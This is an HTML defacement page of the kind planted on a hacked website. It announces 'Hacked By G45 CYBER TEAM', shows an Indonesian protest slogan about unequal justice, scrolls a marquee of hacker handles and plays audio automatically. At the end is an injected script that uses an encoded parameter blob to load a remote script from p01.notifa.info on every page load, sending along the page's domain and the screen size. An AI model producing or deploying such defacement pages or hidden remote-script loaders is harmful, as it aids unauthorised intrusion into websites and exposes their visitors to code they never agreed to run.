<html>
	<head>
		<title>Gerakan45</title>
		<meta name="description" content="Gerakan45," />
		<meta name="keywords" content="Gerakan45, G45 CYBER TEAM, VenomGhost" />
		<meta property="og:image" content="https://i.ibb.co/L1Sz1gH/20190815-200910.png" />
		<link rel="shortcut icon" href="https://i.ibb.co/L1Sz1gH/20190815-200910.png" />
		<link href="https://fonts.googleapis.com/css?family=Righteous&display=swap" rel="stylesheet">
		<link href="https://fonts.googleapis.com/css?family=Bangers&display=swap" rel="stylesheet">
		<style type="text/css">
			@keyframes up-in{
				0%{margin-top:-1400px; transform:rotateY(90deg);}
				100%{margin-top:50px; transform:rotateY(0deg);}
			}
			body{
				background-color: white;
				background: url(http://znzfx.000webhostapp.com/indo-flag.jpg);
				background-repeat: no-repeat;
				background-position: center center;
				background-size: 2200px;
				text-align: center;
			}
			.anim{
				animation: up-in ease 4s 1 alternate forwards;
			}
			.heked{
				font-size: 80px;
				font-family: 'Bangers' , sans-serif;
				letter-spacing: 0.02em;
				text-shadow: 5px 5px 0px rgba(0,0,0,0.4);
				color: red;
				-webkit-text-stroke-color: white;
				-webkit-text-stroke-width: 2px;
			}
			.imeg{
				height: 350px;
				filter: drop-shadow(5px 5px 0px rgba(0,0,0,0.4));
			}
			.nkri{
				font-size: 40px;
				font-family: 'Bangers' , sans-serif;
				text-shadow: 5px 5px 0px rgba(0,0,0,0.4);
				font-weight: bold;
				color: white;
				-webkit-text-stroke-color: red;
				-webkit-text-stroke-width: 2px;
			}
			.thx{
				background-color: red;
				width: 70%;
				padding: 25px;
				border-radius: 20px;
				border: 6px solid #fff;
				box-shadow: 5px 5px 0px rgba(0,0,0,0.4);
				text-align: center;
				color: #fff;
				font-size: 30px;
				font-family: 'Righteous';
				margin: 0;
			}
		</style>
	</head>
	<body>
	<div class="anim">
		<table width="100%" height="50%"><td align="center">
			<font class="heked">Hacked By G45 CYBER TEAM</font>
			<br><img class="imeg" src="https://i.ibb.co/L1Sz1gH/20190815-200910.png">
			<br><font class="nkri">Tegakanlah Hukum Yang Adil<br>Pada Rakyat Kecil Seperti Kami<br>Jangan Jadikan Negara Ini <br>Negara Hukum Yang Tumpul Keatas Tajam Kebawah</font>
		</td></table>
		<center>
			<div class="thx">
				<marquee>VenomGhost - 7April666host - ./Fak3Smile404 - ./Hndra7 - Mr.D3X - ./Throne404 - Mr.666HCK - Mr.Ar - Mr.XID - Kurcaci Cyber Team - Black Coders Anonymous</marquee>
			</div>
			<!--475939590-->
			<br>
			<audio src="https://api.soundcloud.com/tracks/475939590/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" type="audio/mpeg" autoplay="autoplay" controls="controls"></audio>
		</center>
	</div>
	<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH25vFcqEm%2fvjY8lHwWkGYxJKf1mqw7Er0BHSvrDnV10LwIzPqat2hE33mWarbY8mkJctKH%2fFURDbaTDT2fcGfc3%2b0F5JZvIBJWtkqKLNqVfE0yf8SjvoS0yagRxoY6D60uCw4FMovHg9cDg4R3iMsQ%2bRHB1oJ2aqCFFHhejqg5hiM1HA4jYbBCLYpp08cF8PjA7xRx4js2QIHMa2DAUTIOVzDjRXAHcg5OJqBBDHHgwhDy2lJGCBx3rd5AqQZRqw2yvfwIFKZ8oVXpcynZ0zNO%2bx0YXK%2fAG%2bRJevq%2broxg8%2bIAXOz5B5MMzknBXEailcHl1mbvjrWV5JwaampmecqTGofFtEUzAnJcLCEka8jmwB%2bzCZpprxzKbL0qzR4k29ezMJdhqGnC4Z2q4epposTYnWDNYgsCMtZHpgAMZbtSXg%2bUAeZKh1sm8I0SVSyJOoA%2bG7KjVXJ%2fM8tJBXT5tT1YjPb67R4C%2beQ6igL%2f6c0IsayaYW2Hti2DxLJpQFHUHEnvPRgZdhB8d15zlOFep5zR%2bnRQCocYhhSBu9dgXse2%2bPaz5BUJCyFQJW%2b9MUqJCchlanpjYL1eS0OYn7h7BWbOjI5aWWdcY2ZMP%2fXI7bS7wtrkgVCBueSdZFLW7ZLI6cyV9YrB1H6Vn8k%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
